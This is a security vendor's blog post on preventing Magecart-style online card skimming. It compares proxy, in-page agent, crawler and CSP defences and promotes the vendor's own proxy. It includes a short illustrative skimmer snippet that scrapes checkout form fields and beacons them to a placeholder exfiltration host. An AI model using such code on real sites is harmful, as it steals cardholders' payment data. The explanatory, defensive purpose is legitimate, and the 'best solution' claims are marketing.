
What's the leading technology to prevent credit card skimming?

Monday, July 21st, 2025


Carlo D'Agnolo

Today’s main threat to credit card information is not the physical skimmer; it is the online supply-chain attack on websites. Attackers insert malicious JavaScript into payment pages, and once injected, the script captures card data in real time as it is entered, often without detection.

The term Magecart is often used synonymously with these types of attacks. It originates from early attacks on the Magento platform, which is popular for e-commerce websites, and combines “Magento” and “cart” - a nod to the checkout carts where the attacks often take place.

Both Magento and WordPress are popular targets for client-side attacks, which often exploit older versions of the platforms that haven’t been properly updated. Read up on the biggest Magecart attacks to date.

Visa’s Spring 2025 Biannual Threats Report identifies digital skimming as one of the “most prolific and consistent threats” in the payments ecosystem. The report notes that Visa’s eCommerce Threat Disruption system (eTD) proactively scans merchant sites for skimmer signatures across North America and Europe.

Read Visa's report.

Mastercard’s own Digital Skimming: How to Stay Protected guide explains how their RiskRecon platform locates these malicious scripts, tracks their injection dates and durations, and identifies related vulnerabilities.

Read Mastercard's report.

How supply‑chain skimming works

The attacker needs access to a JavaScript file on the targeted page. How they get it can vary. The most common approach is to compromise a script already present on the website: often an older plugin that wasn’t updated or maintained, or a third-party script or marketing tool. They then alter the script to carry out their attack.

There are variants of this, as seen in the British Airways attack, where attackers breached the backend and installed a script directly on the BA website.

In either case, the script running client-side (i.e., in the browser) can now do almost anything. In skimming operations, attackers most often:

  • Copy the form fields upon submission or via keylogging (sketched below)
  • Redirect the checkout page to a fake payment portal
  • Overlay a malicious iframe on top of the original payment page
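
To make the first of those techniques concrete, here is a minimal, illustrative sketch of the kind of form-scraping logic a skimmer injects. The form selector and the exfiltration endpoint are hypothetical placeholders, not taken from any real attack:

  // Illustrative sketch only: the kind of logic a skimmer adds to a checkout page.
  // The selector and the exfiltration endpoint are hypothetical placeholders.
  document.querySelector('form#checkout').addEventListener('submit', () => {
    const stolen = {};
    document.querySelectorAll('input').forEach((field) => {
      stolen[field.name] = field.value; // card number, expiry, CVV, name, ...
    });
    // Quietly ship the captured fields to an attacker-controlled endpoint.
    navigator.sendBeacon('https://exfil.example.invalid/collect', JSON.stringify(stolen));
  });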

Anyone with access to JavaScript on a page can do virtually anything they want. These scripts are highly adaptable, can change behavior based on various criteria, and are a perfect silent way to skim credit cards and PII.

Solutions overview

Proxy-based

Client-side skimming is difficult to detect precisely because it happens outside your infrastructure. The scripts executing in your customer’s browser are dynamic, and attackers often compromise tools that already have legitimate access.

That’s why seeing the actual payload as it’s delivered to real users is critical. Without this visibility, you’re never fully certain what ran or where the compromise began.

We built our solution around a hybrid proxy model because it’s the only approach that gives full, real-time coverage across modern frontends. Every script that reaches your users passes through the proxy, which gives full visibility into the payload that was actually delivered, along with a complete history and analysis of every script.
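
As a rough sketch of the underlying idea (not our actual implementation), a proxy in the delivery path can hash each script payload it is about to serve and compare it against previously reviewed versions before the browser ever executes it. The upstream origin, the allowlist, and the port below are hypothetical placeholders:

  // Rough sketch of the proxy idea, not a production implementation: inspect
  // each script payload before it reaches the browser (Node 18+ for global fetch).
  const http = require('http');
  const crypto = require('crypto');

  // sha256 hashes of script payloads that have already been reviewed (placeholder value).
  const KNOWN_GOOD = new Set(['<sha256-of-reviewed-payload>']);

  http.createServer(async (req, res) => {
    // Fetch the script from the real origin on the user's behalf (hypothetical origin).
    const upstream = await fetch('https://scripts.example-origin.com' + req.url);
    const body = Buffer.from(await upstream.arrayBuffer());
    const hash = crypto.createHash('sha256').update(body).digest('hex');

    if (KNOWN_GOOD.has(hash)) {
      res.writeHead(200, { 'Content-Type': 'application/javascript' });
      res.end(body); // serve the verified payload
    } else {
      console.warn('Unrecognized script payload:', req.url, hash); // keep a full record
      res.writeHead(403);
      res.end(); // hold back the new payload until it has been reviewed
    }
  }).listen(8080);

Because every delivered payload passes through this point, you also get a complete, per-session record of what actually ran.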

JavaScript-based monitoring (Agents)

Some vendors offer detection via JavaScript tags you embed in your page. This means the attacker sees them too. Think of it as a mousetrap: it can be seen, and it can be avoided. If someone is injecting scripts into your checkout, they can also modify or disable the monitoring script.
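
For illustration, such an agent often boils down to an in-page script that watches the DOM for unexpected additions, roughly like the sketch below. The reporting endpoint is a hypothetical placeholder:

  // Rough sketch of an in-page "agent": watch for script tags added after load
  // and report them. The reporting endpoint is a hypothetical placeholder.
  const observer = new MutationObserver((mutations) => {
    for (const mutation of mutations) {
      for (const node of mutation.addedNodes) {
        if (node.tagName === 'SCRIPT') {
          // Report the newly injected script for review.
          navigator.sendBeacon('/monitoring/report', JSON.stringify({
            src: node.src || 'inline',
            seenAt: Date.now(),
          }));
        }
      }
    }
  });
  observer.observe(document.documentElement, { childList: true, subtree: true });
  // The core limitation: any attacker running in this same page can call
  // observer.disconnect() or strip this tag out entirely.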

Detection-only tools also tend to trigger alerts after data has already been exfiltrated. We think prevention is better.

Crawlers

Crawler-based tools work by simulating visits to your website and capturing the scripts and resources that load during those visits. Crucially, they don’t necessarily receive the same script payload as an actual user; they merely ‘mimic’ one.
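
A typical scan of this kind looks roughly like the sketch below, here using Puppeteer as one example of a headless browser; the checkout URL is a hypothetical placeholder. It records whichever scripts were served to that single synthetic visit:

  // Rough sketch of a crawler-based scan, using Puppeteer as an example headless
  // browser: visit the page once and log every script served to that visit.
  const puppeteer = require('puppeteer');

  (async () => {
    const browser = await puppeteer.launch();
    const page = await browser.newPage();

    page.on('request', (request) => {
      if (request.resourceType() === 'script') {
        console.log('Script loaded:', request.url()); // record for later comparison
      }
    });

    await page.goto('https://shop.example.com/checkout'); // hypothetical URL
    await browser.close();
    // A skimmer that only activates for real customers (logged in, specific
    // geography, sampled sessions) may never fire during this visit.
  })();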

Scripts are dynamic in nature, and attackers use this to their advantage. In theory and in practice, these crawlers are detectable and therefore avoidable.

Crawlers are useful for surface scans. But skimmers don’t operate at the surface.

Content Security Policy (CSP)

Content Security Policy (CSP) is a browser feature that allows site owners to define which sources of content (like scripts) are allowed to load on a page. When properly configured, CSP can help block unauthorized or unexpected third-party code by restricting script origins.

It’s a valuable preventive control, especially for reducing exposure to inline script injections or loading from unknown domains. We recommend using CSP as one layer only, because CSP can’t see the payload of the script.
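
As a concrete illustration, a restrictive policy for a checkout page might be set from the server roughly like this. The Express setup and the allowed payment-provider origin are hypothetical placeholders:

  // Illustrative sketch: sending a restrictive CSP header from an Express app.
  // The allowed payment-provider origin is a hypothetical placeholder.
  const express = require('express');
  const app = express();

  app.use((req, res, next) => {
    res.setHeader(
      'Content-Security-Policy',
      // Only first-party scripts and one reviewed third-party origin may load.
      "default-src 'self'; script-src 'self' https://js.payment-provider.example"
    );
    next();
  });

  app.listen(3000);
  // CSP can block scripts from unlisted origins, but it says nothing about what
  // an allowed script actually does once it loads.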

In our talks and presentations, we often use the following slide to illustrate CSP:

You have 2 boxes. One holds a puppy, the other a bomb. Which is which…? That’s CSP.

Read more on CSP here.

On our compare page, we dive into all four approaches laid out here in detail.

A short recap of solutions

Scripts that load in your customer’s browser can access input fields, modify content, send data elsewhere, and more. They’re dynamic, often sourced from third parties, and can be altered without your knowledge.

That’s why client-side skimming is so effective. And why preventing it requires more than surface-level scanning.

Why is the delivery path so important?

Because that’s the only way to see what actually reaches the user. Scripts are dynamic. Attackers can change them at any time, often conditionally. If you’re not in the delivery path, you’re relying on snapshots or assumptions. Sitting in the path means you see every request, for every session, in real time, and you can act on it before anything dangerous executes.

What’s the best way to prevent these attacks?

The most effective method today is our proxy-based script monitoring. It inspects every script before it reaches the browser, verifies its integrity, and blocks malicious code in real time. It works on every user session and provides full visibility, logging, and compliance coverage.

Is JavaScript-based monitoring (Agents) a good option?

It can help detect some threats, but it runs inside the same environment attackers target. If an attacker can inject a skimmer, they can likely disable or bypass the monitoring script too. It’s useful, but not enough on its own.

Is a crawler a good option?

Crawlers simulate visits to your site and log visible scripts. They’re good for periodic scans, but they don’t operate inside real sessions. If a skimmer is only active under certain conditions (like a logged-in user or a specific IP range), crawlers won’t see it.

Is CSP a good option?

CSP (Content Security Policy) can reduce risk by limiting where scripts are allowed to load from. But it doesn’t analyze what a script does once it loads. It’s a helpful layer, but not a solid detection or prevention system.


More About Carlo D'Agnolo

I work on Marketing at c/side.